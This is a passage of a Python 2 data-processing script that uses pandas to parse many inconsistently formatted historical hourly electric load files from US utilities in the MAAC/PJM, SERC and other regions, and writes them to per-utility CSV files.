1994 : pd.read_csv('%s/main/1994/SIPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/SIPC96' % (fulldir), engine='python', header=None)[0].values,
1997 : pd.read_csv('%s/main/1997/SIPC97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/main/1998/SIPC98' % (fulldir), engine='python', header=None)[0].values,
1999 : pd.read_csv('%s/main/1999/SIPC99' % (fulldir), engine='python', header=None)[0].replace('no data', '0').astype(float).values,
2000 : pd.read_csv('%s/main/2000/SIPC00' % (fulldir), engine='python', header=None)[0].astype(str).str[:3].astype(float).values,
2001 : pd.read_csv('%s/main/2001/SIPC01' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
2002 : pd.read_csv('%s/main/2002/SIPC02' % (fulldir), sep='\t', skiprows=3, header=None)[1].values,
2003 : pd.read_csv('%s/main/2003/SIPC03' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
2004 : pd.read_csv('%s/main/2004/SIPC04' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values
},
17828 : {
1993 : pd.read_csv('%s/main/1993/SPIL93' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None).iloc[:, 3:].values.ravel(),
1994 : pd.read_csv('%s/main/1994/SPIL94' % (fulldir), sep=' ', skipinitialspace=True, skiprows=6, header=None).iloc[:, 3:].values.ravel(),
1995 : pd.read_csv('%s/main/1995/SPIL95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
1996 : pd.read_csv('%s/main/1996/SPIL96' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:366, 3:].astype(float).values.ravel(),
1997 : pd.read_csv('%s/main/1997/SPIL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
1998 : pd.read_csv('%s/main/1998/SPIL98' % (fulldir), sep='\t', skipinitialspace=True, skiprows=8, header=None).iloc[:, 4:].values.ravel(),
1999 : pd.read_csv('%s/main/1999/SPIL99' % (fulldir), skiprows=4, header=None)[0].values,
2000 : pd.read_csv('%s/main/2000/SPIL00' % (fulldir), skiprows=4, header=None)[0].values,
2001 : pd.read_csv('%s/main/2001/SPIL01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=7, header=None).iloc[:, 5:-1].values.ravel(),
2002 : pd.read_excel('%s/main/2002/SPIL02' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
2003 : pd.read_excel('%s/main/2003/SPIL03' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
2004 : pd.read_excel('%s/main/2004/SPIL04' % (fulldir), sheetname=0, skiprows=5).iloc[:, 3:].values.ravel()
},
19436 : {
1995 : pd.read_fwf('%s/main/1995/UE95' % (fulldir), header=None)[2].values,
1996 : pd.read_fwf('%s/main/1996/UE96' % (fulldir), header=None)[2].values,
1997 : pd.read_fwf('%s/main/1997/UE97' % (fulldir), header=None)[2].values
},
20847 : {
1993 : pd.read_csv('%s/main/1993/WEPC93' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1994 : pd.read_csv('%s/main/1994/WEPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1995 : pd.read_csv('%s/main/1995/WEPC95' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/WEPC96' % (fulldir), engine='python', header=None)[0].values,
1997 : pd.read_excel('%s/main/1997/WEPC97' % (fulldir), header=None)[0].astype(str).str.strip().replace('NA', '0').astype(float).values,
1998 : pd.read_csv('%s/main/1998/WEPC98' % (fulldir), engine='python', header=None)[0].str.strip().replace('NA', 0).astype(float).values,
1999 : pd.read_excel('%s/main/1999/WEPC99' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_excel('%s/main/2000/WEPC00' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_excel('%s/main/2001/WEPC01' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/main/2002/WEPC02' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2003 : pd.read_excel('%s/main/2003/WEPC03' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2004 : pd.read_excel('%s/main/2004/WEPC04' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
20856 : {
1993 : pd.read_fwf('%s/main/1993/WPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/WPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/WPL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/main/1996/WPL96' % (fulldir), header=None, sep='\t').iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/main/1997/WPL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[2].str.replace(',', '').astype(float).values
},
20860 : {
1993 : pd.read_csv('%s/main/1993/WPS93' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).values.ravel(),
1994 : (pd.read_csv('%s/main/1994/WPS94' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).iloc[:, 1:-1]/100).values.ravel(),
1995 : pd.read_csv('%s/main/1995/WPS95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=8, header=None, skipfooter=7)[2].values,
1996 : pd.read_csv('%s/main/1996/WPS96' % (fulldir), sep='\t', skiprows=2).loc[:365, '100':'2400'].astype(float).values.ravel(),
1997 : pd.read_csv('%s/main/1997/WPS97' % (fulldir), sep='\s', header=None, skipfooter=1)[2].values,
1998 : pd.read_csv('%s/main/1998/WPS98' % (fulldir), sep='\s', header=None)[2].values,
1999 : pd.read_excel('%s/main/1999/WPS99' % (fulldir), skiprows=8, skipfooter=8, header=None)[1].values,
2000 : pd.read_excel('%s/main/2000/WPS00' % (fulldir), sheetname=1, skiprows=5, skipfooter=8, header=None)[2].values,
2001 : pd.read_excel('%s/main/2001/WPS01' % (fulldir), sheetname=0, skiprows=5, header=None)[2].values,
2002 : pd.read_csv('%s/main/2002/WPS02' % (fulldir), sep='\s', header=None, skiprows=5)[2].values,
2003 : pd.read_excel('%s/main/2003/WPS03' % (fulldir), sheetname=1, skiprows=6, header=None)[2].values
},
19578 : {
1996 : pd.read_csv('%s/main/1996/UPP96' % (fulldir), header=None, skipfooter=1).iloc[:, -1].values,
2004 : pd.read_excel('%s/main/2004/UPP04' % (fulldir)).iloc[:, -1].values
},
20858 : {
1997 : pd.read_csv('%s/main/1997/WPPI97' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/main/1999/WPPI99' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/main/2000/WPPI00' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
2001 : pd.read_excel('%s/main/2001/WPPI01' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel(),
2002 : pd.read_excel('%s/main/2002/WPPI02' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel()
},
19436 : {
1998 : pd.read_csv('%s/main/1998/AMER98' % (fulldir), sep='\t').iloc[:, -1].str.strip().replace('na', 0).astype(float).values,
1999 : pd.read_csv('%s/main/1999/AMER99' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2000 : pd.read_csv('%s/main/2000/AMER00' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2001 : pd.read_csv('%s/main/2001/AMER01' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('n/a', 0).astype(float).values,
2002 : pd.read_csv('%s/main/2002/AMER02' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2003 : pd.read_csv('%s/main/2003/AMER03' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2004 : pd.read_csv('%s/main/2004/AMER04' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values
},
4045 : {
2000 : pd.read_excel('%s/main/2000/CWL00' % (fulldir), skiprows=2).iloc[:, 1:].values.ravel(),
2001 : pd.read_excel('%s/main/2001/CWL01' % (fulldir), skiprows=1).iloc[:, 0].values,
2002 : pd.read_excel('%s/main/2002/CWL02' % (fulldir), header=None).iloc[:, 0].values,
2003 : pd.read_excel('%s/main/2003/CWL03' % (fulldir), header=None).iloc[:, 0].values
}
}
main[20847][1994][main[20847][1994] > 9000] = 0
main[20847][1995][main[20847][1995] > 9000] = 0
main[20847][1996][main[20847][1996] > 9000] = 0
if not os.path.exists('./main'):
os.mkdir('main')
for k in main.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(main[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(main[k][i]))) for i in main[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./main/%s.csv' % k)
# EEI
# Bizarre formatting until 1998
###### MAAC
# AE: 963
# BC: 1167
# DPL: 5027
# PU: 7088
# PN: 14715
# PE: 14940
# PEP: 15270
# PS: 15477
# PJM: 14725
# ALL UTILS
# Raw PJM hourly files, one DataFrame per year.  1993/1994 are fixed-width
# (a 20-char leading label field followed by twelve 5-char value columns);
# 1995/1996 are tab-delimited.  All four drop a one-line footer.
_pjm_widths = [20] + [5] * 12
maac93 = pd.read_fwf('%s/maac/1993/PJM93' % fulldir, widths=_pjm_widths, header=None, skipfooter=1)
maac94 = pd.read_fwf('%s/maac/1994/PJM94' % fulldir, widths=_pjm_widths, header=None, skipfooter=1)
maac95 = pd.read_csv('%s/maac/1995/PJM95' % fulldir, sep='\t', header=None, skipfooter=1)
maac96 = pd.read_csv('%s/maac/1996/PJM96' % fulldir, sep='\t', header=None, skipfooter=1)
# Hourly load for the MAAC / PJM member utilities, keyed by utility ID and
# then by year (IDs follow the AE/BC/DPL/... legend in the comments above).
# 1993-1994 values are selected from the fixed-width frames maac93/maac94 by
# matching the utility code in column 0; 1995-1996 from the tab-delimited
# maac95/maac96 with the code in column 1; 1997 from a single Excel workbook
# with one sheet per utility (hourly values in columns 1:25 of each daily
# row; `.iloc[:366, ...]` additionally caps at 366 day-rows where used).
maac = {
    963 : {    # AE
        1993 : maac93[maac93[0].str.contains('AE')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('AE')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('AE')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('AE')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='ACE_LOAD').iloc[:, 1:25].values.ravel()
    },
    1167 : {    # BC
        1993 : maac93[maac93[0].str.contains('BC')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('BC')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('BC')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('BC')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='BC_LOAD').iloc[:, 1:25].values.ravel()
    },
    5027 : {    # DPL -- coded 'DP' in the 1993-96 files
        1993 : maac93[maac93[0].str.contains('DP')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('DP')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('DP')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('DP')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='DPL_LOAD').iloc[:366, 1:25].values.ravel()
    },
    7088 : {    # PU -- note the 1997 workbook names this sheet 'GPU_LOAD'
        1993 : maac93[maac93[0].str.contains('PU')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('PU')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('PU')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('PU')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='GPU_LOAD').iloc[:366, 1:25].values.ravel()
    },
    14715 : {    # PN -- only available as its own sheet in the 1997 workbook
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PN_LOAD').iloc[:366, 1:25].values.ravel()
    },
    14940 : {    # PE -- str.contains treats 'PE$' as a regex, so the '$'
                 # anchor keeps 'PEP' rows out of this utility's match
        1993 : maac93[maac93[0].str.contains('PE$')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('PE$')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('PE$')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('PE$')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PE_Load').iloc[:366, 1:25].values.ravel()
    },
    15270 : {    # PEP
        1993 : maac93[maac93[0].str.contains('PEP')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('PEP')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('PEP')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('PEP')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PEP_LOAD').iloc[:366, 1:25].values.ravel()
    },
    15477 : {    # PS
        1993 : maac93[maac93[0].str.contains('PS')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('PS')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('PS')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('PS')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PS_Load').iloc[:366, 1:25].values.ravel()
    },
    14725 : {    # PJM -- the only entry that extends past 1997 (separate
                 # per-year files for 1998-2000)
        1993 : maac93[maac93[0].str.contains('PJM')].iloc[:, 1:].values.ravel(),
        1994 : maac94[maac94[0].str.contains('PJM')].iloc[:, 1:].values.ravel(),
        1995 : maac95[maac95[1].str.contains('PJM')].iloc[:, 2:].values.ravel(),
        1996 : maac96[maac96[1].str.contains('PJM')].iloc[:, 2:].values.ravel(),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PJM_LOAD').iloc[:366, 1:25].values.ravel(),
        1998 : pd.read_csv('%s/maac/1998/PJM98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        1999 : pd.read_excel('%s/maac/1999/PJM99' % (fulldir), header=None)[2].values,
        2000 : pd.read_excel('%s/maac/2000/PJM00' % (fulldir), header=None)[2].values
    }
}
if not os.path.exists('./maac'):
os.mkdir('maac')
for k in maac.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(maac[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(maac[k][i]))) for i in maac[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./maac/%s.csv' % k)
###### SERC
# AEC: 189
# CPL: 3046
# CEPC: 40218
# CEPB: 3408
# MEMP: 12293
# DUKE: 5416
# FPWC: 6235 *
# FLINT: 6411
# GUC: 7639
# LCEC: 10857
# NPL: 13204
# OPC: 13994
# SCEG: 17539
# SCPS: 17543
# SMEA: 17568
# TVA: 18642
# VIEP: 19876
# WEMC: 20065
# DU: 4958
# AECI: 924
# ODEC-D: 402290
# ODEC-V: 402291
# ODEC: 40229
# SOCO-APCO: 195
# SOCO-GPCO: 7140
# SOCO-GUCO: 7801
# SOCO-MPCO: 12686
# SOCO-SECO: 16687 *?
serc = {
189 : {
1993 : pd.read_csv('%s/serc/1993/AEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/AEC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/serc/1995/AEC95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/serc/1996/AEC96' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/serc/1997/AEC97' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/serc/1998/AEC98' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/serc/1999/AEC99' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=3).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/serc/2000/AEC00' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2001 : pd.read_csv('%s/serc/2001/AEC01' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/serc/2002/AEC02' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/serc/2004/AEC04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel()
},
3046 : {
1994 : pd.read_csv('%s/serc/1994/CPL94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/serc/1995/CPL95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5)[1].values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPL96' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/CPL97' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/CPL98' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/CPL99' % (fulldir)).readlines()[1:]])[2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/CPL00' % (fulldir))['Load'].values,
2001 : pd.read_excel('%s/serc/2001/CPL01' % (fulldir))['Load'].values,
2002 : pd.read_excel('%s/serc/2002/CPL02' % (fulldir))['Load'].values,
2003 : pd.read_excel('%s/serc/2003/CPL03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/serc/2004/CPL04' % (fulldir))['Load'].values
},
40218 : {
1993 : pd.read_fwf('%s/serc/1993/CEPC93' % (fulldir), header=None).iloc[:, 1:-1].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/CEPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/serc/1995/CEPC95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1996 : (pd.read_fwf('%s/serc/1996/CEPC96' % (fulldir)).iloc[:-1, 1:]/1000).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPC97' % (fulldir)).readlines()[5:]]).iloc[:-1, 1:].astype(float)/1000).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPC98' % (fulldir)).readlines()]).iloc[:, 1:].astype(float)).values.ravel(),
2000 : pd.read_excel('%s/serc/2000/CEPC00' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2001 : pd.read_excel('%s/serc/2001/CEPC01' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values
},
3408 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/CEPB93' % (fulldir)).readlines()[12:]])[1].astype(float)/1000).values,
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/CEPB94' % (fulldir)).readlines()[10:]])[1].astype(float)).values,
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/CEPB95' % (fulldir)).readlines()[6:]])[2].astype(float)).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPB96' % (fulldir)).readlines()[10:]])[2].astype(float)).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPB97' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPB98' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/CEPB99' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/CEPB00' % (fulldir)).readlines()[11:]])[2].astype(float)).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/CEPB01' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/CEPB02' % (fulldir)).readlines()[6:]])[4].astype(float)).values,
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/CEPB03' % (fulldir)).readlines()[6:]])[2].astype(float)).values
},
12293 : {
2000 : (pd.read_csv('%s/serc/2000/MEMP00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/MEMP01' % (fulldir)).readlines()[1:]])[3].str.replace(',', '').astype(float)/1000).values,
2002 : (pd.read_csv('%s/serc/2002/MEMP02' % (fulldir), sep='\t').iloc[:, -1].str.replace(',', '').astype(float)/1000).values,
2003 : pd.read_csv('%s/serc/2003/MEMP03' % (fulldir)).iloc[:, -1].str.replace(',', '').astype(float).values
},
5416 : {
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/DUKE99' % (fulldir)).readlines()[4:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/DUKE00' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/DUKE01' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/DUKE02' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/DUKE03' % (fulldir)).readlines()[5:-8]])[2].astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/DUKE04' % (fulldir)).readlines()[5:]])[2].astype(float).values
},
6411 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/FLINT93' % (fulldir)).readlines()])[6].astype(float)/1000).values,
1994 : ((pd.DataFrame([i.split() for i in open('%s/serc/1994/FLINT94' % (fulldir)).readlines()[:-1]])).iloc[:, -1].astype(float)/1000).values,
1995 : ((pd.DataFrame([i.split() for i in open('%s/serc/1995/FLINT95' % (fulldir)).readlines()[1:]]))[3].astype(float)/1000).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/FLINT96' % (fulldir)).readlines()[3:-2]]))[2].astype(float).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/FLINT97' % (fulldir)).readlines()[6:]]))[3].astype(float).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/FLINT98' % (fulldir)).readlines()[4:]]))[2].astype(float).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/FLINT99' % (fulldir)).readlines()[1:]]))[1].astype(float).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/FLINT00' % (fulldir)).readlines()[2:]]))[4].astype(float).values
},
7639 : {
1993 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1994 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1995 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1996 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1997 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1998 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1999 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
2000 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
},
10857 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/LCEC93' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel(),
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/LCEC94' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel()
},
13204 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/NPL93' % (fulldir)).readlines()[6:]])[2].astype(float).values,
1994 : pd.read_fwf('%s/serc/1994/NPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13994 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/OPC93' % (fulldir)).readlines()[4:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/OPC95' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/OPC96' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/OPC97' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/OPC98' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/OPC99' % (fulldir)).readlines()[18:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/OPC00' % (fulldir)).readlines()[19:]])[2].astype(float).values
},
17539 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCEG93' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/SCEG95' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCEG96' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
